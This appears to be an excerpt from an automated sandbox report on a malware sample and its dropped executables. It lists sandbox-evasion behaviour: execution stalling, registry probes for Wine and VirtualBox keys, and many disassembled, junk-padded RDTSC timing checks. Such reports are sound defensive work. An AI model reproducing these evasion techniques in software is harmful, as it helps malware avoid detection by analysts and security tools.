Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Stalling execution: Execution stalls by calling Sleep
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\setup.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 1DD374 second address: 1DCBEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jg 00007FDDE8CE13EEh 0x00000010 jmp 00007FDDE8CE13E8h 0x00000015 push dword ptr [ebp+122D15E5h] 0x0000001b xor dword ptr [ebp+122D1864h], edx 0x00000021 call dword ptr [ebp+122D2AEBh] 0x00000027 pushad 0x00000028 jmp 00007FDDE8CE13E5h 0x0000002d xor eax, eax 0x0000002f cld 0x00000030 mov edx, dword ptr [esp+28h] 0x00000034 pushad 0x00000035 pushad 0x00000036 push ecx 0x00000037 pop esi 0x00000038 push ecx 0x00000039 pop eax 0x0000003a popad 0x0000003b jmp 00007FDDE8CE13E6h 0x00000040 popad 0x00000041 mov dword ptr [ebp+122D3A7Eh], eax 0x00000047 jmp 00007FDDE8CE13E9h 0x0000004c mov esi, 0000003Ch 0x00000051 pushad 0x00000052 jmp 00007FDDE8CE13E2h 0x00000057 mov dword ptr [ebp+122D275Bh], edi 0x0000005d popad 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 mov dword ptr [ebp+122D1996h], eax 0x00000068 lodsw 0x0000006a mov dword ptr [ebp+122D275Bh], edx 0x00000070 add eax, dword ptr [esp+24h] 0x00000074 jmp 00007FDDE8CE13E5h 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d xor dword ptr [ebp+122D275Bh], ecx 0x00000083 push eax 0x00000084 push ebx 0x00000085 push edx 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 341349 second address: 341353 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDDE9067F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 341353 second address: 341385 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FDDE8CE13E8h 0x0000000a jmp 00007FDDE8CE13E1h 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 354A74 second address: 354A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 354A78 second address: 354A7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 354A7E second address: 354A8E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FDDE9067F6Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 354E49 second address: 354E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FDDE8CE13DEh 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 354FC9 second address: 354FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jo 00007FDDE9067F77h 0x00000011 jmp 00007FDDE9067F71h 0x00000016 popad 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 357E0E second address: 357E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push esi 0x00000009 call 00007FDDE8CE13D8h 0x0000000e pop esi 0x0000000f mov dword ptr [esp+04h], esi 0x00000013 add dword ptr [esp+04h], 00000014h 0x0000001b inc esi 0x0000001c push esi 0x0000001d ret 0x0000001e pop esi 0x0000001f ret 0x00000020 mov dword ptr [ebp+122D2636h], edi 0x00000026 push 00000000h 0x00000028 or esi, dword ptr [ebp+122D2679h] 0x0000002e push 67395580h 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 357E49 second address: 357E4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 357E4D second address: 357E51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 357E51 second address: 357E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 357E57 second address: 357E61 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDDE8CE13DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 357E61 second address: 357E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 67395500h 0x0000000d push 00000003h 0x0000000f mov di, 7617h 0x00000013 push 00000000h 0x00000015 sub dl, FFFFFF8Ch 0x00000018 push 00000003h 0x0000001a push BA1712A0h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 pop eax 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 357E85 second address: 357E89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 357E89 second address: 357E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 357E92 second address: 357EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 add dword ptr [esp], 05E8ED60h 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FDDE8CE13D8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 lea ebx, dword ptr [ebp+1244ECB2h] 0x0000002f mov edx, dword ptr [ebp+122D1991h] 0x00000035 xchg eax, ebx 0x00000036 pushad 0x00000037 jmp 00007FDDE8CE13E5h 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 357F94 second address: 35801A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 xor dword ptr [esp], 509543A1h 0x0000000e cld 0x0000000f push 00000003h 0x00000011 and edx, dword ptr [ebp+122D3916h] 0x00000017 push 00000000h 0x00000019 jmp 00007FDDE9067F76h 0x0000001e push 00000003h 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007FDDE9067F68h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a mov edi, dword ptr [ebp+122D3A12h] 0x00000040 push ebx 0x00000041 movsx edi, dx 0x00000044 pop edi 0x00000045 call 00007FDDE9067F69h 0x0000004a pushad 0x0000004b jg 00007FDDE9067F7Ch 0x00000051 push eax 0x00000052 push edx 0x00000053 push esi 0x00000054 pop esi 0x00000055 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 35801A second address: 358036 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDDE8CE13E2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 358036 second address: 35805C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FDDE9067F75h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 35805C second address: 358061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 358061 second address: 358067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 358067 second address: 358083 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDDE8CE13D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007FDDE8CE13DCh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 358083 second address: 358088 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 358088 second address: 358099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 358153 second address: 35818B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDDE9067F6Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FDDE9067F74h 0x00000010 nop 0x00000011 mov cx, di 0x00000014 push 00000000h 0x00000016 mov cx, bx 0x00000019 push F10BC8BFh 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3582B5 second address: 3582C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FDDE8CE13DCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3582C5 second address: 3582C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 37798A second address: 3779AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDE8CE13DCh 0x00000009 jng 00007FDDE8CE13D6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jc 00007FDDE8CE13D6h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3779AB second address: 3779DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 jo 00007FDDE9067F97h 0x0000000d jmp 00007FDDE9067F71h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FDDE9067F74h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3779DF second address: 3779E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 377B35 second address: 377B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 377B3A second address: 377B41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 377B41 second address: 377B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 377F4B second address: 377F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 377F52 second address: 377F63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDDE9067F6Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 377F63 second address: 377F6D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDDE8CE13D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 378375 second address: 3783B8 instructions: 0x00000000 rdtsc 0x00000002 je 00007FDDE9067F66h 0x00000008 jmp 00007FDDE9067F78h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jno 00007FDDE9067F7Ch 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3783B8 second address: 3783CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDDE8CE13DDh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3783CE second address: 3783D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3787A3 second address: 3787A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 378EE9 second address: 378EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 378EEF second address: 378EFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FDDE8CE13D6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3792E0 second address: 3792E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3792E4 second address: 3792EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 379569 second address: 37956D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 37956D second address: 37958A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13E3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 37958A second address: 37958E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 33C2E8 second address: 33C312 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FDDE8CE13F1h 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 38127A second address: 381280 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 381280 second address: 381285 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 381285 second address: 3812EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FDDE9067F75h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jng 00007FDDE9067F72h 0x00000019 jnp 00007FDDE9067F6Ch 0x0000001f jnl 00007FDDE9067F66h 0x00000025 mov eax, dword ptr [eax] 0x00000027 jmp 00007FDDE9067F78h 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FDDE9067F6Fh 0x00000039 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3812EB second address: 3812F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 38143F second address: 381443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 381443 second address: 381462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDDE8CE13E1h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 385555 second address: 385574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007FDDE9067F78h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 385574 second address: 38558C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13DEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FDDE8CE13D6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 385C6A second address: 385C84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDDE9067F75h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 385F43 second address: 385F4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 385F4E second address: 385F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 387108 second address: 38710C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 38710C second address: 38711D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 38711D second address: 387123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 387123 second address: 387128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 387128 second address: 38712D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 38712D second address: 387133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 387400 second address: 387416 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDDE8CE13DCh 0x00000008 je 00007FDDE8CE13D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 387416 second address: 38741A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 38751F second address: 387523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 387B9E second address: 387BA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 387BA2 second address: 387BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FDDE8CE13D6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 387BB0 second address: 387BC1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebx 0x0000000a cmc 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 387BC1 second address: 387BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
